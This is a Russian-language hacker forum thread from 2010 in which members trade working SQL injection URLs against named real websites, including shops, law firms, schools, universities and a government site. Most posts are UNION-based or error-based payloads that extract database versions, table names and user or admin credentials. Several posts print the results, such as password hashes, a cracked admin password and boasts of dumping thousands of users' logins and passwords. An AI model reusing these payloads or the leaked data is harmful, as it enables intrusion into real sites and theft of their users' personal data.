RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-10-23 21:03:23.200000
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
магазины (Испания)
http://www.almonedavigo.com/tienda.php?id=-44+union+select+concat_ws(0x3a,version(),user(),da tabase())+–+&tit=Coleccionables%20en%20papel
http://www.motorrad.es/tiendas/tienda.php?id=-3+union+select+1,clave+from+motor_bbdd.usuarios+–+
http://www.recicleta.com/html/tienda.php?tipo=bicicletas&id=-12+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42+–+
http://www.kdekovito.com/tienda.php?id=-9+union+select+1,2,concat_ws(0x3a,Userusuario,pass Usuario),4,5,6+from+usuarios_panel+–+
http://www.naturabisse.es/en/tienda.php?id=-335+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),user(),database()),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 %20,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54+–++–+
http://www.coleccionarsellos.com/tienda/tienda.php?id=-112+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9+–+
http://www.elbauldelplacer.com/tienda.php?mod=tienda_productos&id=-50+union+select+1,concat_ws(0x3a,nombre,password), 3,4,user()+from+usuarios+–+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-10-23 21:08:56.320000
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,password,email,sitename),5,6,7,8,9+from+users–&cat=19
5.1.49 keystonecomua@localhost keystonekatalog portbld-freebsd8.0
http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,password,email,sitename),5,6,7,8,9+from+users–&cat=19
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-10-23 21:14:46.690000
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
http://www.boomtowndesign.com/portfolio-project.php?id=56 union select version(),2– 1
http://www.solardesign.com/projects/project_display.php?id=1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1– 1
http://www.meinhardtgroup.com/keypeople.php?id=-228 union select 1,unhex(hex(concat(user,0x3a,password))),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28 from mysql.user limit 0,1– 1
http://www.dallaswebdeveloper.com/pages/portfolio.php?id=graphic' limit 0 /*!union*/ select 1,2,3,/*!table_name*/,5 from information_schema.`tables` limit 17,1– 1
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-10-23 21:20:47.773333
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
http://www.visitnacogdoches.org/news.php?id=-198' union select 1,table_schema,table_name,table_rows,0x3c68723e,6, 0x3c68723e,8 from information_schema.tables where table_rows>0– 1
http://www.ummaclinic.org/news.php?id=-21' /*!union*/ select /*!concat*/(table_name),2,3,4,5,6,7,8,9 /*!from*/ information_schema.`tables` limit 38,1– 1
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-10-23 21:22:58.436666
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
http://www.milsetasia.org/milset/showstatic.php?id=4+and+1=0+union+select+version() ,2,3,4,5,6,7&lang=ar
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-10-26 05:05:20.740000
|
|
|
exploit3602
Сообщений: 6
Оценки: 0
Присоединился: 2010-10-14 22:39:14.350000
|
http://www.baza.kob.tj/?a=city&id=-1+union+select+group_concat(version(),0x3A3A,database(),0x3A3A,user()),2,3–&st=250&o=1
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-02 14:16:15.363333
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
http://www.ufmsko.ru/cal_list.php?Year=2010&Month=12&Day=15&weekDay=3&dep=5%20or%201=1
что с этим можно сделать?)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-02 17:26:02.523333
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://sig.ucaldas.edu.co/gestionDocumental/MECI/formAuditoria.php?codDoc=504+union+select+null,nul l,cast(usename||chr(58)||passwd as int),null,null,null+from+pg_shadow–+
http://sig.ucaldas.edu.co/info
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-02 17:27:36.356666
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://www.cafespb.ru/resto.php?id=715+and+1=0+UnIon+selECt+1,2,group_co ncat(schema_name),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+fro m+information_schema.schemata+–+
ТИЦ : 100 PR: 2
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-02 17:29:13.860000
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://www.spynets.com/cheats/details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))–
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-02 17:30:23.523333
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://www.bheru.com/indianews/?l=4&id=3414+and+1=0+union+select+unhex(hex(concat_ws(0 x3a,user_name,password)))+from+admininfo+–
Database: bherudb
User: bherudbuser@localhost
Version: 5.0.79
Шелл льётся в 2 клика и редактирование соуса паги:3
http://www.nexusarts.com.au/view_performer_details.php?id=61+UnIon+selECt+1,co ncat_ws(0x3a,user_name,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66+from+users+–
Database: nexusprd
User: nexusprd@97.74.24.197
Version: 5.0.91-log
Жирнючий сайт…Админку найти так и не смог, пароль в хешбазах есть.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-04 10:24:37.610000
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://www.annaspansextoys.com/detail.php?addtocart=8&id=8/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4,5,count(email),7,8,9,10,11,12,13,14+from+ memberitems–+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-04 10:25:55.540000
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,file_priv,4 ,5,6,7,8,9+from+mysql.user+where+user='alexey1'+–+
ТИЦ : 275
http://www.ock.ru/news/?lang=rus&id=133'+and+1=0+union+Select+1,2,3,version(),5,6,7 ,8+–+
ТИЦ : 140 PR: 3
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-04 10:27:23.776666
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619' or 1 group by concat((select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate(0x70617373776f7264,column_name)!=0 and table_schema=0x6169345f656e74657270726973655f6462/**/limit/**/0,1),floor(rand(0)*2))having min(0) or 1– 1
http://www.cornerstone-properties.com/agents_details.php?agent_ID=1758'%20or%201%20group %20by%20concat(version(),floor(rand(0)*2))having%2 0min(0)%20or%201–%201
http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619%27%20or%201%20gro up%20by%20concat%28%28select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate%280x70617373776f7264,column_name%29!=0%20an d%20table_schema=0x6169345f656e74657270726973655f6 462/**/limit/**/0,1%29,floor%28rand%280%29*2%29%29having%20min%280 %29%20or%201–%201
http://www.barkalowhomes.com/agents_details.php?agent_ID=6244%27%20or%201%20gro up%20by%20concat%28%28select/**/column_name/**/from/**/information_Schema.columns/**/where/**/table_name=0x6169635f636c69656e7473/**/limit/**/26,1%29,floor%28rand%280%29*2%29%29having%20min%28 0%29%20or%201–%201
http://www.gloor.com/agents_details.php?agent_ID=480%27%20or%201%20grou p%20by%20concat%28version%28%29,floor%28rand%280%2 9*2%29%29having%20min%280%29%20or%201–%201
http://www.mockrealty.com/agents_details.php?agent_ID=1522%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201–%201
http://www.phippsrealty.com/agents_details.php?agent_ID=3192%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201–%201
http://www.nixtann.com/agents_details.php?agent_ID=8432%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201–%201
http://www.marron-gildea.com/agents_details.php?agent_ID=4010%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201–%201
http://www.sirentechnology.co.uk/product_info.php/products_id/550%27%20or%201%20group%20by%20concat%28version%28 %29,floor%28rand%280%29*2%29%29having%20min%280%29 %20or%201–%201
http://www.interbatteries.ca/product_info.php/products_id/2598%27%20or%201%20group%20by%20concat%28version%2 8%29,floor%28rand%280%29*2%29%29having%20min%280%2 9%20or%201–%201
http://www.art21galerie.de/artinfo.php?id=80%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 –%201&pic=47
http://www.coolthings.nl/artinfo.php?id=113%20union%20select%201,2,3,concat _ws(0x3a,login_name,password),5,6,7,8%20from%20cms _auth_user–
http://www.collectart.de/artinfo.php?id=96%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 –%201&lang=de
http://galerie-fries.de/artInfo.php?id=-610%20union%20select%201,version(),3,4,5,6–
http://art26.de/artinfo.php?id=10%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 –%201&pic=15&lang=
http://www.access-networks.eu/artinfo.php?id=-514%20union%20select%201,2,version(),4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,0,0,1–&_cat=1
http://moto-mondo.com/modeli.php?marka_id=-5%20union%20select%201,concat_ws(0x3a,iduser,passw d),3%20from%20admin–
http://www.mypromofits.com/newinfo.php?id=-102%20union%20select%201,version(),3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8–
http://www.joebar.org/p.php?ID=-5%20union%20select%201,2,version(),4,5,6,7,8,9–
http://redwheelweiser.com/p.php?id=-2%20union%20select%201,version(),3,4,5,6,7,8,9–
http://www.edinburghnapierdegreeshow.com/2009/des/s.php?id=16%20or%201%20group%20by%20concat((select user_pass from wp3_users limit 0,1),floor(rand(0)*2))having%20min(0)%20or%201–%201
http://www.fairfaxtimes.com/cms/story.php?id=1050'%20or%201%20group%20by%20concat( version(),floor(rand(0)*2))having%20min(0)%20or%20 1–%201
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-04 10:29:16.880000
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://cats1004.com/info_list.php?categoryi=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion())+–
Database: realty_cats1004
User: realty_cats1004@localhost
Version: 4.0.22-log
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-15 15:10:24.640000
|
|
|
masizz
Сообщений: 91
Оценки: 0
Присоединился: 2010-11-15 14:40:10.526666
|
http://www.blowupbeds.co.uk/index.php?categoryid=445-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14–
http://www.watkinseager.com/lawyers/vcard.php?id=69-999.9+union+select+1,2,3,4,5–
addison : 4399acac459ee92c
catherine : 3b1a29a7593cd15a
http://shawvalenza.com/attorneys_vcard.php?id=5-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14–
http://www.bolanjahnsen.com/create.vcard.php?id=12-999.9+union+select+1,2,3,4,5,6,7,8,9–
http://www.mcginnislaw.com/vcard_professional.php?id=48-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–
http://www.kvn.com/attorneys_vcard.php?id=51-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20–
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-16 16:32:30.660000
|
|
|
Voinmraka
Сообщений: 19
Оценки: 0
Присоединился: 2010-09-26 19:10:33.550000
|
http://www.momomesh.com/download_free.php?id=275-345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26–
Database: moviedll_SuccessDLL
User: moviedll_SuperDL@server3.momomesh.com
Md5: 895c838a25acbba301234dc3b3e1415d
Version: 5.0.77
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-16 17:50:08.870000
|
|
|
Voinmraka
Сообщений: 19
Оценки: 0
Присоединился: 2010-09-26 19:10:33.550000
|
http://www.ismfilms.com/screeningroom/screeningroom-onefilm.php?mid=65-787+union+select+1,2,3,4,group_concat(password,0x3b,userID),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20ISM_Users
Database: fletch
user: fletch@192.168.2.107
Version 5.0.26
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-17 18:48:21.910000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
ХВАТИТ КОПИПАСТИТЬ СКУЛИ С АНТИЧАТА!!!
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-52+union+select+1,2,version(),4,5,6,7,8,9,10,11--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-17 20:19:09.996666
|
|
|
Voinmraka
Сообщений: 19
Оценки: 0
Присоединился: 2010-09-26 19:10:33.550000
|
ты кому?
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-17 20:54:02.310000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.allanhouser.com/newsDetail.php?id=-25+union+select+1,2,version(),4,5,6,7,8--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-17 22:35:01
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.pdma.gov.pk/newsArchive.php?ID=-74+union+select+1,version(),3,4,5,6,7,8,9,10,11--
http://www.smeda.org.pk/main.php?id=-34+union+select+1,version(),3,4,5,6,7--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-18 01:06:04.256666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.christophpaccard.com/newsdetail.php?id=-15+union+select+1,version(),3,4,5,6,7,8--
http://washingtonchinareview.org/newsdetail.php?id=-1539+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--
http://www.whatmobile.com.pk/viewallcomments.php?id=-402+union+select+1,version(),3,4,5,6,7,8,9--
http://www.qpc.edu.pk/news.php?id=-176+union+select+1,version(),3,4,5,6,7,8--
http://econ.lums.edu.pk/people_detail.php?id=-6+union+select+1,2,3,4,5,version(),7,8,9,10,11,12/*
http://www.mrcollege.org.uk/newsdetail.php?id=-15+union+select+1,version(),3,4--
http://www.newsplus.co.th/NewsDetail.php?id=-6271+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-18 22:48:49.390000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.starofdavid.co.il/page.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,version(),9,10,11,12,13,14,15--
http://www.avicom.co.il/page.php?id=-5+union+select+1,version(),3,4--
http://www.njassemblyrepublicans.com/press_release.php?id=-1198+order+by+31--
http://novamedgroup.com/medteam.php?id=81+order+by+7--
http://www.geoffschultz.org/Log_Page.php?id=-1206+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
http://www.oncure.com/doctor_popup.php?id=-81+order+by+10--
http://www.hg.med.umich.edu/facultyprofile.php?id=-5+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-20 18:34:19.250000
|
|
|
Nuclear0077
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-18 13:45:48.023333
|
Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '91.213.8.66' (4) in /home/users2/w/wow-miror/domains/royal-wow.org/inc/reg.php on line 6
Warning: mysql_selectdb(): supplied argument is not a valid MySQL-Link resource in /home/users2/w/wow-miror/domains/royal-wow.org/inc/reg.php on line 7
Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '91.213.8.66' (4) in /home/users2/w/wow-miror/domains/royal-wow.org/inc/reg.php on line 9
Warning: mysql_selectdb(): supplied argument is not a valid MySQL-Link resource in /home/users2/w/wow-miror/domains/royal-wow.org/inc/reg.php on line 10
Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '91.213.8.66' (4) in /home/users2/w/wow-miror/domains/royal-wow.org/inc/reg.php on line 12
Warning: mysql_selectdb(): supplied argument is not a valid MySQL-Link resource in /home/users2/w/wow-miror/domains/royal-wow.org/inc/reg.php on line 13
это Sql инъекция ?
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-20 18:46:19.166666
|
|
|
Nuclear0077
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-18 13:45:48.023333
|
http://royal-wow.org/reg.php?id=-1+order+by+1,2,3,4,5,6,7
вот только как то странно работает сейчас нету ошибки сайт обновишь ошибка появляется
что не так делаю?
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-20 22:52:20.160000
|
|
|
HellViper
Сообщений: 353
Оценки: 0
Присоединился: 2010-07-02 14:11:23.330000
|
quote:
http://www.quiltchalet.com/prod_detail.php?ID=-21+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13–
version: 5.0.67-community
user: quilt_chalet@localhost
database: quilt_chalet
quote:
http://www.talkeetnachamber.org/news.php?id=-159+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11–
version: 5.0.83-log
user: talkeetn_db01@boscgi1001.eigbox.net
database: talkeetn_db01
quote:
http://www.trapca.org/pages.php?id=-89-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11–
version: 5.0.75-0ubuntu10
user: trapca@localhost
database: trapca
quote:
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=-5-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7–
version: 4.0.27-max-log
user: dbo197803277@212.227.114.136
database: db197803277
quote:
http://www.rockiurbanfitness.com.au/trainers.php?id=-2-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5–
version: 5.0.45-community-nt
user: ruf_user@localhost
database: ruf_http
quote:
http://www.fitnessbuildshealth.com/trainers.php?id=-48-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18
version: 4.1.20-max-log
user: start6_ray@71.18.216.33
database: start6_fit
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-21 16:09:55.270000
|
|
|
Nuclear0077
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-18 13:45:48.023333
|
http://royal-wow.org/reg.php?id=-1+order+by+1,2,3,4,5,6,7
вот только как то странно работает сейчас нету ошибки сайт обновишь ошибка появляется
что не так делаю?
народ помогите )
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-21 20:36:47.196666
|
|
|
HellViper
Сообщений: 353
Оценки: 0
Присоединился: 2010-07-02 14:11:23.330000
|
Есть же тема - http://forum.xakep.ru/m_978175/mpage_60/tm.htm
quote:
http://royal-wow.org/reg.php?id=-1+order+by+1,2,3,4,5,6,7
Взято с потолка? ))
quote:
http://www.ylczx.com/readnews.php?id=-161-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6–
version: 5.1.34
user: ylczx_com@localhost
database: ylczx_com
quote:
http://gymn2samara.org/readnews.php?id=-35-1+union+select+1,version(),3,database(),user(),6–
Отомстил школьникам за любимый форум )))
version: 5.0.89-community-log
user: gymnsama_mt@localhost
database: gymnsama_mt
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-23 00:10:50.580000
|
|
|
Nuclear0077
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-18 13:45:48.023333
|
блин не сюда написал модеры удалите сообщение)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-23 02:59:50.183333
|
|
|
Nuclear0077
Сообщений: 7
Оценки: 0
Присоединился: 2010-11-18 13:45:48.023333
|
.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-27 18:12:56.620000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Вроде не баяны,если шо;) извиняйте
Тиц=1800
Pr=3
www.bank.samaratoday.ru/showNews.php?idNews=-2732+union+select+1,2,group_concat(user(),0x3a,database(),0x3a,version(),0x0b),4,5,6,7,8,9,10–
beauty.samaratoday.ru/model.php?id=-19+union+select+1,group_concat(user(),0x0b,database(),0x0b,version(),0x0b),3,4,5,6,7,8,9,10–&n=2
www.mavru.az/page3.php?new=1&type=2&cat=0&size=-2%20union%20select%201,2,3,group_concat(schema_name,0x0b)%20from%20information_schema.schemata–
http://kirovka.ru/Work/index.php?action=details&counteragent=-3426+union+select+1,2,3,4,concat(table_name,0x0b),6,7+from+information_schema.tables+where+table_schema=0x6b69726f766b61–&type=1
Wap сайт:http://files.mavrik.ru/index.php?page=topic&id=9999999+union+select+concat(login,0x3a,email,0x3a,pass,0x0b),2+from+mavrikru_blogs.wblog_users+limit+8740,500–
files.mavrik.ru/index.php?page=topic&id=9999999+union+select+count(*),2+from+mavrikru_blogs.wblog_users–
11360 юзеров плюс их пароли. :)
www.motor-shop.ru/news/-51+union+select+1,count(*),3+from+motorsh_msh.users–16530чувака
www.motor-shop.ru/news/-51+union+select+1,group_concat(login,0x3a,password,0x3a,email,0x0b),3+from+motorsh_msh.users– 1653чувака плюс пароли в открытом виде
www.motor-shop.ru/news/-51+union+select+1,group_concat(login,0x3a,password,0x3a,email,0x0b),3+from+motorsh_msh.users–
:)от плюсов не откажусь:)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-11-27 18:17:00.506666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Сообщение удалено
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-03 22:01:42.826666
|
|
|
HostyaK
Сообщений: 17
Оценки: 0
Присоединился: 2010-12-03 21:50:29.313333
|
http://www.bonvisage.com.au/cart.php?id=18
Гляньте может что интересное есть.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-03 22:19:41.396666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Просто ошибка
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-04 00:02:59.170000
|
|
|
HostyaK
Сообщений: 17
Оценки: 0
Присоединился: 2010-12-03 21:50:29.313333
|
специально не поленился раскрутил) где ошибка то?
Target: http://www.bonvisage.com.au/cart.php?id=18
Host IP: 202.125.46.82
Web Server: Apache
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: bonvisage_cart
Data Bases: information_schema
bonvisage_cart
admin 5f4dcc3b5aa765d61d8327deb882cf99 (password)
вот еще одна гляньте тут вроде как картон есть.
http://generalecology.com/cart.php?id=3
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-04 12:06:18.193333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: HostyaK
специально не поленился раскрутил) где ошибка то?
Target: http://www.bonvisage.com.au/cart.php?id=18
Host IP:202.125.46.82
Web Server: Apache
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: bonvisage_cart
Data Bases: information_schema
bonvisage_cart
admin 5f4dcc3b5aa765d61d8327deb882cf99 (password)
Да,чувак,ты прав .я с пьяну не разглядел наверное ,извиняй:www.bonvisage.com.au/cart.php?id=-12'+union+select+1,2,3,4,group_concat(user(),0x0b,database(),0x0b,version()),6,7,8,9,0–+
Если не поставить плюс(пробел)в конце ,то скуля ниче не выводит,поспешил.
quote:
вот еще одна гляньте тут вроде как картон есть.
http://generalecology.com/cart.php?id=3
Сервер не отвечает.
P.S.каким софтом для скуль пользуешься?
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-04 16:12:08.453333
|
|
|
homicide2
Сообщений: 121
Оценки: 0
Присоединился: 2010-10-19 15:55:36.693333
|
наверное Havij :)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-04 19:29:33.733333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
всегда прикалывали эти слова–quote:
:
ORIGINAL:специально не поленился раскрутил) что нажал на кнопочку analise|> и пошёл пить чай ?:D или всё таки руками пошерстил???:D:D
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-04 21:40:04.980000
|
|
|
HostyaK
Сообщений: 17
Оценки: 0
Присоединился: 2010-12-03 21:50:29.313333
|
незнаю кто чем крутит))) но хави очень многое не докручивает. поэтому все перепроверяется ручками)) еще одна ссылочка http://download.wamoncam.com/paypal.php?id=14
|
|
|
|
|
|
